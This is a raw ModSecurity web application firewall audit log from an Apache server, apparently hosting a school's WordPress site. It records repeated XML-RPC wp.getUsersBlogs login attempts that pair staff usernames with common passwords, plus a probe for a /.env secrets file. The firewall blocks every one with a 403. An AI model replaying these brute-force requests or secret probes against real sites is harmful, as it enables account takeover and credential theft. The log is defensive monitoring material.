Stopwatch: 1745079960457613 5163 (- - -)
Stopwatch2: 1745079960457613 5163; combined=3658, p1=444, p2=3047, p3=0, p4=0, p5=98, sr=87, sw=69, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--8c5d5836-Z--
--02c6b857-A--
[19/Apr/2025:23:27:00 +0700] aAPO1OvDiFC_ir7MDwZSVAAAAE4 103.236.140.4 37806 103.236.140.4 8181
--02c6b857-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 182.43.73.90
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 182.43.73.90
X-Forwarded-Proto: http
Connection: close
Content-Length: 219
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--02c6b857-C--
wp.getUsersBlogs
kajur
adminmlg
--02c6b857-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--02c6b857-E--
--02c6b857-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (37+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745080020840371 5348 (- - -)
Stopwatch2: 1745080020840371 5348; combined=3754, p1=444, p2=3141, p3=0, p4=0, p5=99, sr=88, sw=70, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--02c6b857-Z--
--7164e31b-A--
[19/Apr/2025:23:28:01 +0700] aAPPEQ6cTFSgLAHl7PpOowAAABA 103.236.140.4 38092 103.236.140.4 8181
--7164e31b-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 182.43.73.90
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 182.43.73.90
X-Forwarded-Proto: http
Connection: close
Content-Length: 215
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--7164e31b-C--
wp.getUsersBlogs
kajur
2003
--7164e31b-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--7164e31b-E--
--7164e31b-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (19+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745080081226401 4949 (- - -)
Stopwatch2: 1745080081226401 4949; combined=3648, p1=449, p2=3020, p3=0, p4=0, p5=104, sr=88, sw=75, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--7164e31b-Z--
--abcc0a4c-A--
[19/Apr/2025:23:29:02 +0700] aAPPTuvDiFC_ir7MDwZSegAAAFU 103.236.140.4 38406 103.236.140.4 8181
--abcc0a4c-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 182.43.73.90
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 182.43.73.90
X-Forwarded-Proto: http
Connection: close
Content-Length: 217
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--abcc0a4c-C--
wp.getUsersBlogs
kajur
public
--abcc0a4c-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--abcc0a4c-E--
--abcc0a4c-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (33+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745080142523138 5384 (- - -)
Stopwatch2: 1745080142523138 5384; combined=3771, p1=492, p2=3107, p3=0, p4=0, p5=102, sr=90, sw=70, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--abcc0a4c-Z--
--6558d804-A--
[19/Apr/2025:23:30:02 +0700] aAPPiuvDiFC_ir7MDwZSsAAAAFc 103.236.140.4 38720 103.236.140.4 8181
--6558d804-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 182.43.73.90
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 182.43.73.90
X-Forwarded-Proto: http
Connection: close
Content-Length: 216
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--6558d804-C--
wp.getUsersBlogs
kajur
xxxxx
--6558d804-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--6558d804-E--
--6558d804-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (48+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745080202112277 3783 (- - -)
Stopwatch2: 1745080202112277 3783; combined=2458, p1=322, p2=2011, p3=0, p4=0, p5=73, sr=59, sw=52, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--6558d804-Z--
--d01ac66b-A--
[19/Apr/2025:23:31:02 +0700] aAPPxuvDiFC_ir7MDwZSxgAAAFQ 103.236.140.4 39100 103.236.140.4 8181
--d01ac66b-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 182.43.73.90
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 182.43.73.90
X-Forwarded-Proto: http
Connection: close
Content-Length: 219
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--d01ac66b-C--
wp.getUsersBlogs
kajur
baseball
--d01ac66b-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--d01ac66b-E--
--d01ac66b-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (46+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745080262529185 5604 (- - -)
Stopwatch2: 1745080262529185 5604; combined=3728, p1=489, p2=3085, p3=0, p4=0, p5=91, sr=82, sw=63, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--d01ac66b-Z--
--8e5edf4c-A--
[19/Apr/2025:23:31:05 +0700] aAPPyUruoUXZj665VUFyqgAAAMI 103.236.140.4 39122 103.236.140.4 8181
--8e5edf4c-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 182.43.73.90
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 182.43.73.90
X-Forwarded-Proto: http
Connection: close
Content-Length: 219
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--8e5edf4c-C--
wp.getUsersBlogs
kajur
1234%^&*
--8e5edf4c-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--8e5edf4c-E--
--8e5edf4c-H--
Message: XML parser error: XML: Failed parsing document.
Message: Warning. Match of "eq 0" against "REQBODY_ERROR" required. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "27"] [id "210230"] [rev "2"] [msg "COMODO WAF: The request body could not be parsed. Possibility of an impedance mismatch attack. This is not a false positive.||smkn22-jkt.sch.id|F|2"] [data "XML parser error: XML: Failed parsing document."] [severity "CRITICAL"] [tag "CWAF"] [tag "Protocol"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745080265360348 5862 (- - -)
Stopwatch2: 1745080265360348 5862; combined=4058, p1=517, p2=3367, p3=0, p4=0, p5=105, sr=89, sw=69, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--8e5edf4c-Z--
--436cb05b-A--
[19/Apr/2025:23:32:03 +0700] aAPQA-vDiFC_ir7MDwZS2QAAAEw 103.236.140.4 39426 103.236.140.4 8181
--436cb05b-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 182.43.73.90
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 182.43.73.90
X-Forwarded-Proto: http
Connection: close
Content-Length: 217
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--436cb05b-C--
wp.getUsersBlogs
kajur
pepper
--436cb05b-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--436cb05b-E--
--436cb05b-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (32+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745080323956672 5280 (- - -)
Stopwatch2: 1745080323956672 5280; combined=3736, p1=465, p2=3103, p3=0, p4=0, p5=99, sr=88, sw=69, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--436cb05b-Z--
--c878b255-A--
[19/Apr/2025:23:33:06 +0700] aAPQQnNa4dA2HllpK_Pn3wAAAI0 103.236.140.4 39752 103.236.140.4 8181
--c878b255-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 182.43.73.90
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 182.43.73.90
X-Forwarded-Proto: http
Connection: close
Content-Length: 218
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--c878b255-C--
wp.getUsersBlogs
kajur
jackson
--c878b255-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--c878b255-E--
--c878b255-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (35+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745080386529605 16858 (- - -)
Stopwatch2: 1745080386529605 16858; combined=27864, p1=439, p2=3049, p3=0, p4=0, p5=12203, sr=86, sw=77, l=0, gc=12096
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--c878b255-Z--
--6ea49330-A--
[19/Apr/2025:23:34:08 +0700] aAPQgA6cTFSgLAHl7PpPSQAAAAU 103.236.140.4 40066 103.236.140.4 8181
--6ea49330-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 182.43.73.90
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 182.43.73.90
X-Forwarded-Proto: http
Connection: close
Content-Length: 217
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--6ea49330-C--
wp.getUsersBlogs
kajur
lovely
--6ea49330-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--6ea49330-E--
--6ea49330-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (35+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745080448433403 6181 (- - -)
Stopwatch2: 1745080448433403 6181; combined=4294, p1=525, p2=3524, p3=0, p4=0, p5=138, sr=93, sw=107, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--6ea49330-Z--
--14a3935b-A--
[19/Apr/2025:23:35:09 +0700] aAPQvevDiFC_ir7MDwZTFQAAAEo 103.236.140.4 40394 103.236.140.4 8181
--14a3935b-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 182.43.73.90
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 182.43.73.90
X-Forwarded-Proto: http
Connection: close
Content-Length: 217
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--14a3935b-C--
wp.getUsersBlogs
kajur
olivia
--14a3935b-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--14a3935b-E--
--14a3935b-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (35+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745080509483357 5950 (- - -)
Stopwatch2: 1745080509483357 5950; combined=4082, p1=521, p2=3386, p3=0, p4=0, p5=103, sr=93, sw=72, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--14a3935b-Z--
--2cd1fa3c-A--
[19/Apr/2025:23:36:10 +0700] aAPQ-nNa4dA2HllpK_PoPAAAAIo 103.236.140.4 40706 103.236.140.4 8181
--2cd1fa3c-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 182.43.73.90
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 182.43.73.90
X-Forwarded-Proto: http
Connection: close
Content-Length: 219
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--2cd1fa3c-C--
wp.getUsersBlogs
kajur
myspace1
--2cd1fa3c-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--2cd1fa3c-E--
--2cd1fa3c-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (28+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745080570905968 5884 (- - -)
Stopwatch2: 1745080570905968 5884; combined=4108, p1=537, p2=3383, p3=0, p4=0, p5=111, sr=91, sw=77, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--2cd1fa3c-Z--
--463c1073-A--
[19/Apr/2025:23:37:18 +0700] aAPRPkruoUXZj665VUFzQAAAANE 103.236.140.4 41038 103.236.140.4 8181
--463c1073-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 182.43.73.90
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 182.43.73.90
X-Forwarded-Proto: http
Connection: close
Content-Length: 220
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--463c1073-C--
wp.getUsersBlogs
kesiswaan
admin
--463c1073-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--463c1073-E--
--463c1073-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (27+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745080638123102 4935 (- - -)
Stopwatch2: 1745080638123102 4935; combined=3730, p1=462, p2=3089, p3=0, p4=0, p5=104, sr=87, sw=75, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--463c1073-Z--
--3aca805b-A--
[19/Apr/2025:23:38:19 +0700] aAPRe3Na4dA2HllpK_PoXgAAAIY 103.236.140.4 41314 103.236.140.4 8181
--3aca805b-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 182.43.73.90
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 182.43.73.90
X-Forwarded-Proto: http
Connection: close
Content-Length: 229
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--3aca805b-C--
wp.getUsersBlogs
kesiswaan
kesiswaan@2020
--3aca805b-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--3aca805b-E--
--3aca805b-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (18+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745080699927292 5241 (- - -)
Stopwatch2: 1745080699927292 5241; combined=3823, p1=439, p2=3216, p3=0, p4=0, p5=98, sr=87, sw=70, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--3aca805b-Z--
--d2d80125-A--
[19/Apr/2025:23:39:22 +0700] aAPRug6cTFSgLAHl7PpPfwAAAAo 103.236.140.4 41620 103.236.140.4 8181
--d2d80125-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 182.43.73.90
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 182.43.73.90
X-Forwarded-Proto: http
Connection: close
Content-Length: 223
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--d2d80125-C--
wp.getUsersBlogs
kesiswaan
1qazxsw2
--d2d80125-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--d2d80125-E--
--d2d80125-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (31+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745080762487967 5204 (- - -)
Stopwatch2: 1745080762487967 5204; combined=3812, p1=458, p2=3178, p3=0, p4=0, p5=103, sr=100, sw=73, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--d2d80125-Z--
--3163232a-A--
[19/Apr/2025:23:39:50 +0700] aAPR1nNa4dA2HllpK_PomAAAAI0 103.236.140.4 41746 103.236.140.4 8181
--3163232a-B--
GET /.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 103.59.160.222
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 103.59.160.222
X-Forwarded-Proto: http
Connection: close
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50
Accept: */*
--3163232a-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--3163232a-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745080790135423 684 (- - -)
Stopwatch2: 1745080790135423 684; combined=283, p1=246, p2=0, p3=0, p4=0, p5=36, sr=70, sw=1, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--3163232a-Z--
--b9407134-A--
[19/Apr/2025:23:40:23 +0700] aAPR90ruoUXZj665VUFzaQAAANY 103.236.140.4 41912 103.236.140.4 8181
--b9407134-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 182.43.73.90
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 182.43.73.90
X-Forwarded-Proto: http
Connection: close
Content-Length: 229
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--b9407134-C--
wp.getUsersBlogs
kesiswaan
Beast3x@8*#4@!
--b9407134-F--
